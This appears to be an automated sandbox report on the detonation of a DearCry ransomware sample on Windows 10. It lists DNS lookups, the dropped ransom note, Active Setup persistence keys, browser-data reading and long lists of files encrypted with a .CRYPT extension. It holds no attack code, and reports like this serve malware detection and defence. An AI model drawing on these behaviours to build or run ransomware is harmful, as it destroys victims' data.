US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dmrvuf2.2oh.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\README.72c99bf6.TXT

Analysis: behavioral24

Detonation Overview

Submitted 2024-07-28 16:38
Reported 2024-07-28 16:43
Platform win10v2004-20240709-en
Max time kernel 77s
Max time network 155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Signatures

DearCry

ransomware dearcry

Renames multiple (7374) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1750093773-264148664-1320403265-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1750093773-264148664-1320403265-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1750093773-264148664-1320403265-1000\desktop.ini C:\Windows\explorer.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Windows\explorer.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\bun.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\7-Zip\Lang\sr-spc.txt.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\micaut.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\bcel.md.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\proofing.msi.16.en-us.vreg.dat C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SplashScreen.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg4.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\policytool.exe.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN048.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-white\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\music_welcome_page.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ReachFramework.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Google\Chrome\Application\123.0.6312.106\VisualElements\Logo.png.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-72_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Dark.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\UIAutomationProvider.resources.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\codec\librtpvideo_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSplashLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-string-l1-1-0.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-96_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-60_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko\UIAutomationClient.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageSplashScreen.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupMedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-sysinfo-l1-1-0.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-180.png.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Collections.NonGeneric.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main.css.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.AnalysisServices.XLHost.Modeler.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOARIA.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Ear.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\demux\libvc1_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\Assets\AppSplashScreen.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.187.41\msedgeupdate.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-time-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\tracedefinition130.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
